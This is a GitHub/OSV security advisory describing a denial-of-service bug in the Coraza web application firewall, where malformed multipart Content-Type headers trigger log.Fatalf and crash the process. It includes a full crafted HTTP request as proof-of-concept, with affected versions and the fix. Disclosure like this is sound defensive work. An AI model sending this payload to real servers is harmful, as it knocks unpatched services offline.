GHSA-c2pj-v37r-2p6h

Suggest an improvement
Source
https://github.com/advisories/GHSA-c2pj-v37r-2p6h
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-c2pj-v37r-2p6h/GHSA-c2pj-v37r-2p6h.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-c2pj-v37r-2p6h
Aliases
Published
2023-06-26T15:48:33Z
Modified
2023-11-08T04:13:22.295580Z
Severity
  • 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVSS Calculator
Summary
Coraza has potential denial of service vulnerability
Details

Summary

Due to the misuse of log.Fatalf, the application using coraza crashed after receiving crafted requests from attackers.

Details

https://github.com/corazawaf/coraza/blob/82157f85f24c6107667bf0f686b71a72aafdf8a5/internal/bodyprocessors/multipart.go#L26-L29 The bodyprocessors of multipart uses log.Fatalf to handle errors from the mime.ParseMediaType, but log.Fatalf calls os.Exit directly after logging the error. https://github.com/golang/go/blob/a031f4ef83edc132d5f49382bfef491161de2476/src/log/log.go#L288-L291 This means that the application will immediately crash after receiving a malicious request that triggers an error in mime.ParseMediaType.

PoC

The server can be demonstrated by https://github.com/corazawaf/coraza/tree/main/examples/http-server

After sending this request

POST / HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: curl/8.1.2
Accept: */*
Content-Length: 199
Content-Type: multipart/form-data; boundary=------------------------5fa6351b877326a1; a=1; a=2
Connection: close

--------------------------5fa6351b877326a1
Content-Disposition: form-data; name="file"; filename="123"
Content-Type: application/octet-stream

123

--------------------------5fa6351b877326a1--

The server will crash immediately. The a=1; a=2 in Content-Type makes mime: duplicate parameter name error.

Impact

I believe the vulnerability was introduced by the following commit: https://github.com/corazawaf/coraza/commit/24af0c8cf4f10bab558740b595712be3b85493ec.

Mitigation

The error from mime.ParseMediaType should return directly.

References

Affected packages

Go / github.com/corazawaf/coraza/v3

Package

Name
github.com/corazawaf/coraza/v3
View open source insights on deps.dev
Purl
pkg:golang/github.com/corazawaf/coraza/v3

Affected ranges

Type
SEMVER
Events
Introduced
3.0.0
Fixed
3.0.1

Go / github.com/corazawaf/coraza/v2

Package

Name
github.com/corazawaf/coraza/v2
View open source insights on deps.dev
Purl
pkg:golang/github.com/corazawaf/coraza/v2

Affected ranges

Type
SEMVER
Events
Introduced
2.0.0
Last affected
2.0.1